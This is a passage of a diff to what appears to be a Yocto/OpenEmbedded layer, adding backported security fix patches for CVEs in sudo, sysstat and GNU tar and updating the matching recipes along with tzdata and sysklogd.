+-	if (strlcat(line, errstr, len) >= len ||
+-	    strlcat(line, " ; ", len) >= len)
+-	    goto toobig;
+-    }
+-    if (strlcat(line, LL_TTY_STR, len) >= len ||
+-	strlcat(line, user_tty, len) >= len ||
+-	strlcat(line, " ; ", len) >= len)
+-	goto toobig;
+-    if (strlcat(line, LL_CWD_STR, len) >= len ||
+-	strlcat(line, user_cwd, len) >= len ||
+-	strlcat(line, " ; ", len) >= len)
+-	goto toobig;
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr);
++    }
++    if (user_tty != NULL) {
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty);
++    }
++    if (user_cwd != NULL) {
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd);
++    }
+     if (runas_pw != NULL) {
+-	if (strlcat(line, LL_USER_STR, len) >= len ||
+-	    strlcat(line, runas_pw->pw_name, len) >= len ||
+-	    strlcat(line, " ; ", len) >= len)
+-	    goto toobig;
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ",
++	    runas_pw->pw_name);
+     }
+     if (runas_gr != NULL) {
+-	if (strlcat(line, LL_GROUP_STR, len) >= len ||
+-	    strlcat(line, runas_gr->gr_name, len) >= len ||
+-	    strlcat(line, " ; ", len) >= len)
+-	    goto toobig;
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++	    runas_gr->gr_name);
+     }
+     if (tsid != NULL) {
+-	if (strlcat(line, LL_TSID_STR, len) >= len ||
+-	    strlcat(line, tsid, len) >= len ||
+-	    strlcat(line, " ; ", len) >= len)
+-	    goto toobig;
+-    }
+-    if (evstr != NULL) {
+-	if (strlcat(line, LL_ENV_STR, len) >= len ||
+-	    strlcat(line, evstr, len) >= len ||
+-	    strlcat(line, " ; ", len) >= len)
+-	    goto toobig;
+-	free(evstr);
+-	evstr = NULL;
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid);
++    }
++    if (sudo_user.env_vars != NULL) {
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]);
++	for (i = 1; sudo_user.env_vars[i] != NULL; i++) {
++	    sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
++		sudo_user.env_vars[i]);
++	}
+     }
+     if (user_cmnd != NULL) {
+-	if (strlcat(line, LL_CMND_STR, len) >= len)
+-	    goto toobig;
+-	if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len)
+-	    goto toobig;
+-	if (strlcat(line, user_cmnd, len) >= len)
+-	    goto toobig;
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
++	    "COMMAND=%s", user_cmnd);
+ 	if (user_args != NULL) {
+-	    if (strlcat(line, " ", len) >= len ||
+-		strlcat(line, user_args, len) >= len)
+-		goto toobig;
++	    sudo_lbuf_append_esc(&lbuf,
++		LBUF_ESC_CNTRL|LBUF_ESC_QUOTE,
++		" %s", user_args);
+ 	}
+     }
+ 
+-    debug_return_str(line);
+-oom:
+-    free(evstr);
++    if (!sudo_lbuf_error(&lbuf))
++	debug_return_str(lbuf.buf);
++
++    sudo_lbuf_destroy(&lbuf);
+     sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
+     debug_return_str(NULL);
+-toobig:
+-    free(evstr);
+-    free(line);
+-    sudo_warnx(U_("internal error, %s overflow"), __func__);
+-    debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoreplay.c
++++ b/plugins/sudoers/sudoreplay.c
+@@ -71,6 +71,7 @@
+ #include "sudo_conf.h"
+ #include "sudo_debug.h"
+ #include "sudo_event.h"
++#include "sudo_lbuf.h"
+ #include "sudo_util.h"
+ 
+ #ifdef HAVE_GETOPT_LONG
+@@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head
+ }
+ 
+ static int
+-list_session(char *logfile, regex_t *re, const char *user, const char *tty)
++list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re,
++    const char *user, const char *tty)
+ {
+     char idbuf[7], *idstr, *cp;
+     const char *timestr;
+@@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re,
+     }
+     /* XXX - print rows + cols? */
+     timestr = get_timestr(li->tstamp, 1);
+-    printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ",
+-	timestr ? timestr : "invalid date",
+-	li->user, li->tty, li->cwd, li->runas_user);
+-    if (li->runas_group)
+-	printf("GROUP=%s ; ", li->runas_group);
+-    printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd);
+-
+-    ret = 0;
+-
++    sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ",
++	timestr ? timestr : "invalid date", li->user);
++    if (li->tty != NULL) {
++	sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ",
++	    li->tty);
++    }
++    if (li->cwd != NULL) {
++	sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ",
++	    li->cwd);
++    }
++    sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user);
++    if (li->runas_group != NULL) {
++	sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++	    li->runas_group);
++    }
++    sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr);
++    sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s",
++	    li->cmd);
++
++    if (!sudo_lbuf_error(lbuf)) {
++	puts(lbuf->buf);
++	ret = 0;
++    }
+ done:
++    lbuf->error = 0;
++    lbuf->len = 0;
+     free_log_info(li);
+     debug_return_int(ret);
+ }
+@@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t *
+     DIR *d;
+     struct dirent *dp;
+     struct stat sb;
++    struct sudo_lbuf lbuf;
+     size_t sdlen, sessions_len = 0, sessions_size = 0;
+     unsigned int i;
+     int len;
+@@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t *
+ #endif
+     debug_decl(find_sessions, SUDO_DEBUG_UTIL)
+ 
++    sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+     d = opendir(dir);
+     if (d == NULL)
+ 	sudo_fatal(U_("unable to open %s"), dir);
+@@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t *
+ 
+ 	    /* Check for dir with a log file. */
+ 	    if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) {
+-		list_session(pathbuf, re, user, tty);
++		list_session(&lbuf, pathbuf, re, user, tty);
+ 	    } else {
+ 		/* Strip off "/log" and recurse if a dir. */
+ 		pathbuf[sdlen + len - 4] = '\0';
+@@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t *
+ 	}
+ 	free(sessions);
+     }
++    sudo_lbuf_destroy(&lbuf);
+ 
+     debug_return_int(0);
+ }
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
new file mode 100644
index 0000000000..d021873b70
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
@@ -0,0 +1,26 @@
+Backport of:
+
+From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Mon, 13 Mar 2023 08:04:32 -0600
+Subject: [PATCH] Add missing " ; " separator between environment variables and
+ command. This is a regression introduced in sudo 1.9.13. GitHub issue #254.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/eventlog/eventlog.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c
+ 	    sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
+ 		sudo_user.env_vars[i]);
+ 	}
++	sudo_lbuf_append(&lbuf, " ; ");
+     }
+     if (user_cmnd != NULL) {
+ 	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
diff --git a/meta/recipes-extended/sudo/sudo_1.8.31.bb b/meta/recipes-extended/sudo/sudo_1.8.32.bb
index 39d8817c32..e35bbfa789 100644
--- a/meta/recipes-extended/sudo/sudo_1.8.31.bb
+++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb
@@ -3,12 +3,17 @@ require sudo.inc
 SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \
            ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
            file://0001-Include-sys-types.h-for-id_t-definition.patch \
+           file://0001-Fix-includes-when-building-with-musl.patch \
+           file://CVE-2022-43995.patch \
+           file://CVE-2023-22809.patch \
+           file://CVE-2023-28486_CVE-2023-28487-1.patch \
+           file://CVE-2023-28486_CVE-2023-28487-2.patch \
            "
 
 PAM_SRC_URI = "file://sudo.pam"
 
-SRC_URI[md5sum] = "ce17ff6e72a70f8d5dabba8abf3cd2de"
-SRC_URI[sha256sum] = "7ea8d97a3cee4c844e0887ea7a1bd80eb54cc98fd77966776cb1a80653ad454f"
+SRC_URI[md5sum] = "a7318202ba391079a0e32933f0fb8bd6"
+SRC_URI[sha256sum] = "5ce3c18c5efbecd5437a0945f314f1822423eaf9a2d7eb7ecf80857bc32246c5"
 
 DEPENDS += " virtual/crypt ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
 RDEPENDS_${PN} += " ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-limits pam-plugin-keyinit', '', d)}"
diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc
index 8899daa1b0..e45b256bbe 100644
--- a/meta/recipes-extended/sysklogd/sysklogd.inc
+++ b/meta/recipes-extended/sysklogd/sysklogd.inc
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
 
 inherit update-rc.d update-alternatives systemd autotools
 
-SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \
+SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
            file://sysklogd \
            file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \
            "
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
new file mode 100644
index 0000000000..972cc8938b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
@@ -0,0 +1,92 @@
+From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001
+From: Sebastien <seb@fedora-2.home>
+Date: Sat, 15 Oct 2022 14:24:22 +0200
+Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074)
+
+allocate_structures function located in sa_common.c insufficiently
+checks bounds before arithmetic multiplication allowing for an
+overflow in the size allocated for the buffer representing system
+activities.
+
+This patch checks that the post-multiplied value is not greater than
+UINT_MAX.
+
+Signed-off-by: Sebastien <seb@fedora-2.home>
+
+Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540]
+CVE : CVE-2022-39377
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common.c    | 25 +++++++++++++++++++++++++
+ common.h    |  2 ++
+ sa_common.c |  6 ++++++
+ 3 files changed, 33 insertions(+)
+
+diff --git a/common.c b/common.c
+index ddfe75d..28d475e 100644
+--- a/common.c
++++ b/common.c
+@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char
+ 
+ 	return 0;
+ }
++
++/*
++ ***************************************************************************
++ * Check if the multiplication of the 3 values may be greater than UINT_MAX.
++ *
++ * IN:
++ * @val1	First value.
++ * @val2	Second value.
++ * @val3	Third value.
++ ***************************************************************************
++ */
++void check_overflow(size_t val1, size_t val2, size_t val3)
++{
++	if ((unsigned long long) val1 *
++	    (unsigned long long) val2 *
++	    (unsigned long long) val3 > UINT_MAX) {
++#ifdef DEBUG
++		fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
++			__FUNCTION__,
++			(unsigned long long) val1 * (unsigned long long) val2 *	(unsigned long long) val3);
++#endif
++	exit(4);
++	}
++}
++
+ #endif /* SOURCE_SADC undefined */
+diff --git a/common.h b/common.h
+index 86905ba..75f837a 100644
+--- a/common.h
++++ b/common.h
+@@ -249,6 +249,8 @@ int get_wwnid_from_pretty
+ 	(char *, unsigned long long *, unsigned int *);
+ 
+ #ifndef SOURCE_SADC
++void check_overflow
++	(size_t, size_t, size_t);
+ int count_bits
+ 	(void *, int);
+ int count_csvalues
+diff --git a/sa_common.c b/sa_common.c
+index 8a03099..ff90c1f 100644
+--- a/sa_common.c
++++ b/sa_common.c
+@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[])
+ 	int i, j;
+ 
+ 	for (i = 0; i < NR_ACT; i++) {
++
+ 		if (act[i]->nr_ini > 0) {
++
++			/* Look for a possible overflow */
++			check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini,
++				       (size_t) act[i]->nr2);
++
+ 			for (j = 0; j < 3; j++) {
+ 				SREALLOC(act[i]->buf[j], void,
+ 						(size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2);
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
new file mode 100644
index 0000000000..9a27945a8b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
@@ -0,0 +1,46 @@
+Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-02-18
+
+From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001
+From: Pavel Kopylov <pkopylov@cloudlinux.com>
+Date: Wed, 17 May 2023 11:33:45 +0200
+Subject: [PATCH] Fix an overflow which is still possible for some values.
+
+CVE: CVE-2023-33204
+Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0 
+debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ common.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+Index: sysstat-12.0.3/common.c
+===================================================================
+--- sysstat-12.0.3.orig/common.c
++++ sysstat-12.0.3/common.c
+@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned
+  */
+ void check_overflow(size_t val1, size_t val2, size_t val3)
+ {
+-	if ((unsigned long long) val1 *
+-	    (unsigned long long) val2 *
+-	    (unsigned long long) val3 > UINT_MAX) {
++	if ((val1 != 0) && (val2 != 0) && (val3 != 0) &&
++	    (((unsigned long long) UINT_MAX / (unsigned long long) val1 <
++	      (unsigned long long) val2) ||
++	     ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) <
++	      (unsigned long long) val3))) {
+ #ifdef DEBUG
+-		fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
+-			__FUNCTION__,
+-			(unsigned long long) val1 * (unsigned long long) val2 *	(unsigned long long) val3);
++		fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n",
++			__FUNCTION__, val1, val2, val3);
+ #endif
+-	exit(4);
++		exit(4);
+ 	}
+ }
+ 
diff --git a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
index 2a90f89d25..ac7b898db9 100644
--- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
+++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
@@ -2,7 +2,10 @@ require sysstat.inc
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb"
 
-SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch"
+SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \
+            file://CVE-2022-39377.patch \
+            file://CVE-2023-33204.patch \
+           "
 
 SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb"
 SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732"
diff --git a/meta/recipes-extended/tar/tar/CVE-2021-20193.patch b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
new file mode 100644
index 0000000000..89e8e20844
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
@@ -0,0 +1,133 @@
+From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sun, 17 Jan 2021 20:41:11 +0200
+Subject: Fix memory leak in read_header
+
+Bug reported in https://savannah.gnu.org/bugs/?59897
+
+* src/list.c (read_header): Don't return directly from the loop.
+Instead set the status and break.  Return the status.  Free
+next_long_name and next_long_link before returning.
+
+CVE: CVE-2021-20193
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777]
+Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com>
+
+---
+ src/list.c | 40 ++++++++++++++++++++++++++++------------
+ 1 file changed, 28 insertions(+), 12 deletions(-)
+
+diff --git a/src/list.c b/src/list.c
+index e40a5c8..d7ef441 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ 	     enum read_header_mode mode)
+ {
+   union block *header;
+-  union block *header_copy;
+   char *bp;
+   union block *data_block;
+   size_t size, written;
+-  union block *next_long_name = 0;
+-  union block *next_long_link = 0;
++  union block *next_long_name = NULL;
++  union block *next_long_link = NULL;
+   size_t next_long_name_blocks = 0;
+   size_t next_long_link_blocks = 0;
+-
++  enum read_header status = HEADER_SUCCESS;
++  
+   while (1)
+     {
+-      enum read_header status;
+-
+       header = find_next_block ();
+       *return_block = header;
+       if (!header)
+-	return HEADER_END_OF_FILE;
++	{
++	  status = HEADER_END_OF_FILE;
++	  break;
++	}
+ 
+       if ((status = tar_checksum (header, false)) != HEADER_SUCCESS)
+-	return status;
++	break;
+ 
+       /* Good block.  Decode file size and return.  */
+ 
+@@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ 	{
+ 	  info->stat.st_size = OFF_FROM_HEADER (header->header.size);
+ 	  if (info->stat.st_size < 0)
+-	    return HEADER_FAILURE;
++	    {
++	      status = HEADER_FAILURE;
++	      break;
++	    }
+ 	}
+ 
+       if (header->header.typeflag == GNUTYPE_LONGNAME
+@@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ 	  || header->header.typeflag == SOLARIS_XHDTYPE)
+ 	{
+ 	  if (mode == read_header_x_raw)
+-	    return HEADER_SUCCESS_EXTENDED;
++	    {
++	      status = HEADER_SUCCESS_EXTENDED;
++	      break;
++	    }
+ 	  else if (header->header.typeflag == GNUTYPE_LONGNAME
+ 		   || header->header.typeflag == GNUTYPE_LONGLINK)
+ 	    {
++	      union block *header_copy;
+ 	      size_t name_size = info->stat.st_size;
+ 	      size_t n = name_size % BLOCKSIZE;
+ 	      size = name_size + BLOCKSIZE;
+@@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ 	      xheader_decode_global (&xhdr);
+ 	      xheader_destroy (&xhdr);
+ 	      if (mode == read_header_x_global)
+-		return HEADER_SUCCESS_EXTENDED;
++		{
++		  status = HEADER_SUCCESS_EXTENDED;
++		  break;
++		}
+ 	    }
+ 
+ 	  /* Loop!  */
+@@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ 	      name = next_long_name->buffer + BLOCKSIZE;
+ 	      recent_long_name = next_long_name;
+ 	      recent_long_name_blocks = next_long_name_blocks;
++	      next_long_name = NULL;
+ 	    }
+ 	  else
+ 	    {
+@@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ 	      name = next_long_link->buffer + BLOCKSIZE;
+ 	      recent_long_link = next_long_link;
+ 	      recent_long_link_blocks = next_long_link_blocks;
++	      next_long_link = NULL;
+ 	    }
+ 	  else
+ 	    {
+@@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ 	    }
+ 	  assign_string (&info->link_name, name);
+ 
+-	  return HEADER_SUCCESS;
++	  break;
+ 	}
+     }
++  free (next_long_name);
++  free (next_long_link);
++  return status;
+ }
+ 
+ #define ISOCTAL(c) ((c)>='0'&&(c)<='7')
+-- 
+cgit v1.2.1
+
diff --git a/meta/recipes-extended/tar/tar/CVE-2022-48303.patch b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
new file mode 100644
index 0000000000..b2f40f3e64
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
@@ -0,0 +1,43 @@
+From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 11 Feb 2023 11:57:39 +0200
+Subject: Fix boundary checking in base-256 decoder
+
+* src/list.c (from_header): Base-256 encoding is at least 2 bytes
+long.
+
+Upstream-Status: Backport [see reference below]
+CVE: CVE-2022-48303
+
+Reference to upstream patch:
+https://savannah.gnu.org/bugs/?62387
+https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8
+
+Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+ src/list.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+
+
+(limited to 'src/list.c')
+
+diff --git a/src/list.c b/src/list.c
+index 9fafc42..86bcfdd 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type,
+ 	  where++;
+ 	}
+     }
+-  else if (*where == '\200' /* positive base-256 */
+-	   || *where == '\377' /* negative base-256 */)
++  else if (where <= lim - 2
++	   && (*where == '\200' /* positive base-256 */
++	       || *where == '\377' /* negative base-256 */))
+     {
+       /* Parse base-256 output.  A nonnegative number N is
+ 	 represented as (256**DIGS)/2 + N; a negative number -N is
+-- 
+cgit v1.1
+
diff --git a/meta/recipes-extended/tar/tar/CVE-2023-39804.patch b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
new file mode 100644
index 0000000000..f550928540
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
@@ -0,0 +1,64 @@
+From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 28 Aug 2021 16:02:12 +0300
+Subject: Fix handling of extended header prefixes
+
+* src/xheader.c (locate_handler): Recognize prefix keywords only
+when followed by a dot.
+(xattr_decoder): Use xmalloc/xstrdup instead of alloc
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4]
+CVE: CVE-2023-39804
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xheader.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/src/xheader.c b/src/xheader.c
+index 4f8b2b2..3cd694d 100644
+--- a/src/xheader.c
++++ b/src/xheader.c
+@@ -637,11 +637,11 @@ static struct xhdr_tab const *
+ locate_handler (char const *keyword)
+ {
+   struct xhdr_tab const *p;
+-
+   for (p = xhdr_tab; p->keyword; p++)
+     if (p->prefix)
+       {
+-        if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0)
++	size_t kwlen = strlen (p->keyword);
++        if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0)
+           return p;
+       }
+     else
+@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st,
+                char const *keyword, char const *arg, size_t size)
+ {
+   char *xstr, *xkey;
+-
++  
+   /* copy keyword */
+-  size_t klen_raw = strlen (keyword);
+-  xkey = alloca (klen_raw + 1);
+-  memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */;
++  xkey = xstrdup (keyword);
+ 
+   /* copy value */
+-  xstr = alloca (size + 1);
++  xstr = xmalloc (size + 1);
+   memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */;
+ 
+   xattr_decode_keyword (xkey);
+ 
+-  xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size);
++  xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size);
++
++  free (xkey);
++  free (xstr);
+ }
+ 
+ static void
+-- 
+cgit v1.1
+
diff --git a/meta/recipes-extended/tar/tar_1.32.bb b/meta/recipes-extended/tar/tar_1.32.bb
index ebe6cb0dbd..9297480e85 100644
--- a/meta/recipes-extended/tar/tar_1.32.bb
+++ b/meta/recipes-extended/tar/tar_1.32.bb
@@ -6,8 +6,13 @@ SECTION = "base"
 LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 
+PR = "r1"
+
 SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \
            file://musl_dirent.patch \
+           file://CVE-2021-20193.patch \
+           file://CVE-2022-48303.patch \
+           file://CVE-2023-39804.patch \
 "
 
 SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05"
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
 NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
 
 BBCLASSEXTEND = "native nativesdk"
+
+# Avoid false positives from CVEs in node-tar package
+# For example CVE-2021-{32803,32804,37701,37712,37713}
+CVE_PRODUCT = "gnu:tar"
diff --git a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
index ec04bfe390..a942ac2991 100644
--- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
+++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Fake version of the texinfo utility suite"
 SECTION = "console/utils"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb"
 DEPENDS = ""
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc
index 5368464f30..46bc1b794e 100644
--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \
 the history of local time for many representative locations around the globe."
 HOMEPAGE = "http://www.iana.org/time-zones"
 SECTION = "base"
-LICENSE = "PD & BSD & BSD-3-Clause"
+LICENSE = "PD & BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
 
-PV = "2020d"
+PV = "2024a"
 
 SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
            http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
 
 UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
 
-SRC_URI[tzcode.sha256sum] = "6cf050ba28e8053029d3f32d71341d11a794c6b5dd51a77fc769d6dae364fad5"
-SRC_URI[tzdata.sha256sum] = "8d813957de363387696f05af8a8889afa282ab5016a764c701a20758d39cbaf3"
+SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8"
+SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3"
diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb
index e6a0655afe..cc6206ac70 100644
--- a/meta/recipes-extended/timezone/tzdata.bb
+++ b/meta/recipes-extended/timezone/tzdata.bb
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica  \
         "
 # pacificnew 
 
